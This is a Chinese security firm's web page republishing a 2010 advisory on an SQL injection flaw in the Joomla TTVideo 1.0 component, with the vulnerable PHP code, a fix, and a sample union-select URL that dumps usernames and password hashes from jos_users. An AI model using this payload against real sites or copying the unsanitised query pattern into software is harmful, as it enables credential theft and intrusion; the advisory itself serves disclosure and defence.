网络安全 红科网安(北京)科技有限公司 联系我们 | 加入收藏
信息安全紧急求助:400-6662-110
    红科网安 / 技术研究 融汇优秀技术 创新攻防理念 打造安全专家! Honkwin (Beijing) Science and Technology Co.Ltd
  技术研究
 
 
      业界动态
      安全漏洞
      技术文章
 

    客服热线:
    010-62663110
    010-62717538
Joomla Component TTVideo 1.0 SQL Injection Vulnerability
2010-07-28 15:52:49 作者: honkwin 来源: 浏览次数:0
 
上一篇 下一篇
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
TTVideo 1.0 Joomla Component SQL Injection Vulnerability
 
Download link: http://www.toughtomato.com/resources/downloads/joomla-1.5/components/ttvideo/
 
 Name              TTVideo
 Vendor            http://www.toughtomato.com
 Versions Affected 1.0
 
 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-07-27
 
X. INDEX
 
 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
 
 
I. ABOUT THE APPLICATION
________________________
 
TTVideo  is  a  Joomla!  component that makes use of the
popular  video  sharing  site  Vimeo  to  create a video
library.
 
 
II. DESCRIPTION
_______________
 
A  parameter  in  ttvideo.php  is not properly sanitised
before being used in a SQL query.
 
 
III. ANALYSIS
_____________
 
Summary:
 
 A) SQL Injection
 
 
A) SQL Injection
________________
 
The parameter cid passed to ttvideo.php when task is set
to video  is not properly sanitised before being used in
a SQL query.  This  can  be  exploited to manipulate SQL
queries by injecting arbitrary SQL code.  The  following
is the vulnerable code:
 
ttvideoController.php (line 40):
 
function video() {
    $cid = JRequest::getVar('cid', null, 'default');
    
 
ttvideo.php (line 188):
 
function getVideo($id) {
    $db = $this->getDBO();
    $db->setQuery("SELECT * from #__ttvideo WHERE id=$id");
    $video = $db->loadObject();
    if ($video === null)
      JError::raiseError(500, 'Video with ID: '.$id.' not found.');
    return $video;
}
 
 
IV. SAMPLE CODE
_______________
 
A) SQL Injection
 
http://site/path/index.php?option=com_ttvideo&task=video&cid=-1 union   select 1,2,3,4,5,6,7,8,CONCAT(username,0x3A,password),10,11,12,13,14,15,16,17 FROM jos_users
 
 
V. FIX
______
 
Use JRequest::getInt instead of JRequest::getVar
网络安全   公司简介  | 联系我们  | 加入我们 | 隐私声明 | 版权申明 | 免责条款 | 网站地图 | 合作伙伴 | 合作加盟 | 帮助 | 友情链接 |
Copyright @ 2007-2011 Honkwin. All Rights Reserved.      献身使命,让网络因我们而安全!
京ICP备:09027577号   单位编号:1101083313